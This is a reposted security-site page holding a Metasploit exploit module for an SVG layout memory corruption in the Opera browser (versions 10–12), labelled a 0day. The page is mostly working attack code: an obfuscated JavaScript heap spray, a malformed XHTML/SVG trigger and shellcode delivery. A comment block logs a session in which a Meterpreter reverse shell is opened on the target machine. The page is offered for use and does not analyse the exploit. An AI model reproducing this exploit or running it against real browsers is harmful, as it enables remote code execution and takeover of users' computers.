首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Opera Browser 10/11/12 (SVG layout) Memory Corruption (0day)
来源:http://spa-s3c.blogspot.com 作者:Vazquez 发布时间:2011-10-11  

###############################################################################################################
# Exploit for Opera Browser 10/11/12 (SVG layout) Memory Corruption (0day)
#
# Vulnerability:
#
# Discovered: 2010-10-13
# Patched: 0day
# Tested on: v10.xx (v10.50, v10.51, v10.52, v10.53, v10.54, v10.6, v10.61, v10.62 and v10.63)
#       v11.xx (v11.00, v11.01, v11.10, v11.11, v11.50 and v11.51)
#
# Exploit:
#
# Coded: 2010-10-14
# Last revision: 2011-10-08
#
# This exploit was modified with a new poc and triggering method, to hit Opera Next. The first copy was coded for v10.5x/v10.6x.
#
# RCE on: v11.00, v11.01, v11.10, v11.11, v11.50, v11.51 and v12.00 pre-alpha r1076 (Opera Next)
#
# Notes:
#
# 1) DEP bypass: possible but unreliable.
# 2) Let me know if you improve this one ;)
# 3) Two days ago, Opera Next was updated to 12.00 pre-alpha r1085
#  and this exploit is less reliable, even sometimes never gets crashed.
#  Anyway, I've also seen remote code execution.
#
#
# Credits: Jose A. Vazquez of http://spa-s3c.blogspot.com
#
# Greets to: Ruben, Sinn3r, Metasploit Team, Corelan Team, EnRed20.org, etc
#
#
# Running against Opera v12.00 pre-alpha r1076...
#
#
#
#        =[ metasploit v4.0.1-dev [core:4.0 api:1.0]
# + -- --=[ 742 exploits - 378 auxiliary - 83 post
# + -- --=[ 228 payloads - 27 encoders - 8 nops
#        =[ svn r13810 updated today (2011.10.06)
#
# msf > use windows/browser/opera_svg_0day
# msf  exploit(opera_svg_0day) > set payload windows/meterpreter/reverse_tcp
# payload => windows/meterpreter/reverse_tcp
# msf  exploit(opera_svg_0day) > set LHOST 192.168.1.103
# LHOST => 192.168.1.103
# msf  exploit(opera_svg_0day) > exploit
# [*] Exploit running as background job.
# msf  exploit(opera_svg_0day) >
# [*] Started reverse handler on 192.168.1.103:4444
# [*] Using URL: http://0.0.0.0:8080/dpIDdyCpEoqCa5
# [*]  Local IP: http://192.168.1.103:8080/dpIDdyCpEoqCa5
# [*] Server started.
# [*] Sending Opera Browser 10/11/12 (SVG layout) Memory Corruption to 192.168.1.104:1233 (Method: usual / Target: Opera Browser (v11.xx - v12.00pre-alpha) / Windows XP SP3 (DEP-off))
# [*] Sending stage 1 (Spraying the heap)
# [*] Sending stage 2 (Triggering the vulnerability)
# [*] Sending Opera Browser 10/11/12 (SVG layout) Memory Corruption to 192.168.1.104:1233 (Method: usual / Target: Opera Browser (v11.xx - v12.00pre-alpha) / Windows XP SP3 (DEP-off))
# [*] Sending stage (752128 bytes) to 192.168.1.104
# [*] Sending stage 1 (Spraying the heap)
# [*] Meterpreter session 2 opened (192.168.1.103:4444 -> 192.168.1.104:1234) at 2011-10-08 22:32:31 +0200
# Interrupt: use the 'exit' command to quit
# msf  exploit(opera_svg_0day) > sessions
#
# Active sessions
# ===============
#
#   Id  Type                   Information                              Connection
#   --  ----                   -----------                              ----------
#   1   meterpreter x86/win32  0XDE1-A39ED4C12\0xde1 @ 0XDE1-A39ED4C12  192.168.1.103:4444 -> 192.168.1.104:1234
#
# msf  exploit(opera_svg_0day) > sessions -i 1
# [*] Starting interaction with 1...
#
# meterpreter > execute -f calc.exe
# Process 1752 created.
# meterpreter > exit
# [*] Shutting down Meterpreter...
#
# [*] Meterpreter session 1 closed.  Reason: User exit
# msf  exploit(opera_svg_0day) >
#
################################################################################################################

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

 Rank = NormalRanking

 include Msf::Exploit::Remote::HttpServer::HTML
 
 def initialize(info = {})
 
  super(update_info(info,
   'Name'           => 'Opera Browser 10/11/12 (SVG layout) Memory Corruption',
   'Description'    => %q{
   
    This module exploits a vulnerability in the bad nesting with SVG tags. Successfully exploiting
    leads to remote code execution or denial of service condition under Windows XP SP3 (DEP = off).
    Best results of reliability using Opera v12.00 pre-alpha r1076 whereas that v11.xx will have less
    success (depending of opera.dll version). This module won't work against v10.xx because it was
    modified to exploit Opera upper to v11.
    Read the lastest references for further details.
    
   },
   'License'        => MSF_LICENSE,
   'Author'         =>
    [
     'Jose A. Vazquez'
    ],
   'Version'        => '$Revision: 0011 $',
   'References'     =>
    [
     ['URL', 'http://www.beyondsecurity.com/ssd.html'],
     ['URL', 'http://spa-s3c.blogspot.com/2011/10/spas3c-sv-006opera-browser-101112-0-day.html'], # English
     ['URL', 'http://enred20.org/node/27'] # Spanish
    ],
   'DefaultOptions' =>
    {
     'EXITFUNC'          => 'process',
     'HTTP::compression' => 'gzip',
     'HTTP::chunked'     => true
    },
   'Payload'        =>
    {
     'Space'    => 1000,
     'BadChars' => "\x00",
     'Compat'   =>
      {
       'ConnectionType' => '-find',
      },
     'StackAdjustment' => -3500
    },
   'Platform'       => 'win',
   'Targets'        =>
    [ 

     # spray of ~ 450 MB.
     
     [ 'Opera Browser (v11.xx - v12.00pre-alpha) / Windows XP SP3 (DEP-off)', 
      {
       'Method' => 'usual',
       'MaxOffset' => nil,
       'MaxSize' => nil,
       'MaxBlocks' => 900,
       'Ret' => 0x0c0c0c0c
      }
     ],
     
     # Thanks to sinn3r of metasploit.com for this method.
     
     [ 'Opera Browser (v11.xx) / Windows XP SP3 (DEP-off)', 
      {
       'Method' => 'precise-allocation-size',
       'MaxOffset' => 0x800,
       'MaxSize' => 0x80000,
       'MaxBlocks' => 0x500,
       'Ret' => 0x0c0c0c0c
      }
     ]
    ],
   'DisclosureDate' => '0day',
   'DefaultTarget'  => 0))
   
   #Apply obfuscation by default
   
   register_options(
   [
    OptBool.new('OBFUSCATE', [false, 'JavaScript obfuscation', true])
   ], self.class)
   
 end
 
 def on_request_uri(cli, request)
 
  mytarget = target
  
  if(request.uri =~ /\.xhtml$/)
  
   #Send file for trigger the vulnerability
  
    
   html = %Q|
   <html xmlns="http://www.w3.org/1999/xhtml" xmlns:svt="http://www.w3.org/2000/svg">
    <head>
     <meta http-equiv="refresh" content="0;url=" />
    </head>
    <select1 style = 'padding-bottom: 8711px;background-image: url("HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH");' >
     <svt:svg>
      <svt:title style = 'pointer-events: visiblePainted;font: normal small-caps 120%/120% fantasy;' >
       <svt:svg>
        <svt:font>
         <svt:animateMotion>
          feFuncR
         </svt:animateMotion>
        </svt:font>
       </svt:svg>
      </svt:title>
     </svt:svg>
    </select1>
   </html>
    |
  
   #Send triggerer
  
   print_status("Sending stage 2 (Triggering the vulnerability)")
   var_contentype = 'application/xhtml+xml'
   
  else
   
   #Sending init HTML
   print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport} (Method: #{mytarget['Method']} / Target: #{mytarget.name})")
   
   return if ((p = regenerate_payload(cli)) == nil)
   
   shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(mytarget.arch))
   
   addr_word  = [mytarget.ret].pack('V').unpack('H*')[0][0,4]
   var_timer_trigger  = (rand(3) + 2) * 1000
   var_file_trigger = rand_text_alpha(rand(30)+2)
   
   #Build the exploit
   
   var_url =  ((datastore['SSL']) ? "https://" : "http://")
   var_url << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST'])
   var_url << ":" + datastore['SRVPORT']
   var_url << get_resource
   
   #Choose the heap spray method
   
   if(mytarget['Method'] == 'usual')
   
    spray_js = <<-JS
    
    var shell = unescape("#{shellcode}");
    var size = shell.length * 2;
    var nopsize = 0x100000 - (size + 0x14);
    var nopsled = unescape("%u#{addr_word}");
    
    while(nopsled.length * 2 < nopsize) {
     nopsled += nopsled;
    }
    
    var blocks = new Array();
    
    for (var x = 0; x < #{mytarget['MaxBlocks']}; x++) {
     blocks[x] = nopsled + shell;
    }
      
    function TriggerVuln(){
     document.write("<iframe src='#{var_url}/#{var_file_trigger}.xhtml'></iframe>");
    }
    
    JS
    
   else
   
    #
    # Tested on Opera v11.5x but it's not working on Opera v12.00 pre-alpha
    
    #
    # /*
    #  *  Heap spray for Opera that uses VirtualAlloc
    #  *  Arguments:
    #  *  @blocks     - an emtpy array
    #  *  @code       - the payload
    #  *  @offset     - padding to align the code
    #  *  @chunk_max  - max size for each allocation
    #  *  @blocks_max - max blocks
    # */
    #
    #
   
    spray_js = <<-JS
    
    function heap_spray(blocks, code, offset, chunk_max, blocks_max) {
     if (chunk_max < 0x7F000) {
      throw "This function is meant for size 0x7F000 or higher to trigger VirtualAlloc";
     }
     
     chunk_max /= 2;
    
     var nops = unescape("%u0c0c%u0c0c");
     while (nops.length < chunk_max) nops += nops;
    
     var offset_chunk = nops.substr(0, offset-code.length);
    
     var block = offset_chunk + code + nops.substr(0, chunk_max-offset_chunk.length-code.length);
    
     while (block.length % 8 != 0) block += unescape("%u0c");
    
     var shellcode = block.substr(0, (chunk_max-0x1c)/2);
    
     for (var i=0; i < blocks_max; i++) {
         blocks[i] = shellcode + unescape("%u0c0c");
     }
    }
    
    var blocks = new Array();
    var code = unescape("#{shellcode}");
    heap_spray(blocks, code, #{mytarget['MaxOffset']}, #{mytarget['MaxSize']}, #{mytarget['MaxBlocks']});
    
    function TriggerVuln(){
     document.write("<iframe src='#{var_url}/#{var_file_trigger}.xhtml'></iframe>");
    }
    
    JS
   
   end
   
   if datastore['OBFUSCATE'] == true
    spray_js = ::Rex::Exploitation::JSObfu.new(spray_js)
    spray_js.obfuscate
    trigger_sym = spray_js.sym('TriggerVuln')
    spray_js = spray_js.to_s + "setTimeout('#{trigger_sym}()',#{var_timer_trigger});"
   else
    spray_js = spray_js.to_s + "setTimeout('TriggerVuln()',#{var_timer_trigger});"
   end
   
   html = %Q|
     <html>
      <head>
       <script type="text/javascript">
        #{spray_js}  
       </script>
      </head>
     <html>
    | 
   
   print_status("Sending stage 1 (Spraying the heap)")
   var_contentype = 'text/html'
    
  end
 
 #Response
 send_response(cli, html, { 'Content-Type' => var_contentype, 'Pragma' => 'no-cache' })
 #Handle the payload   
 handler(cli)
  
 end
 
end


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·ScriptFTP <= 3.3 Remote Buffer
·Snortreport nmap.php and nbtsc
·Linux pkexec and polkitd 0.96
·myBB 1.6.4 Backdoor Exploit
·Linux Kernel 2.6.9-34 Local ro
·ACDSee FotoSlate PLP File id P
·Spreecommerce 0.60.1 Arbitrary
·Apache mod_proxy Proof Of Conc
·pkexec Race Condition Privileg
·TugZip 3.5 Zip File Parsing Bu
·Linux Kernel 2.6.22 Local root
·Mozilla Firefox Array.reduceRi
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved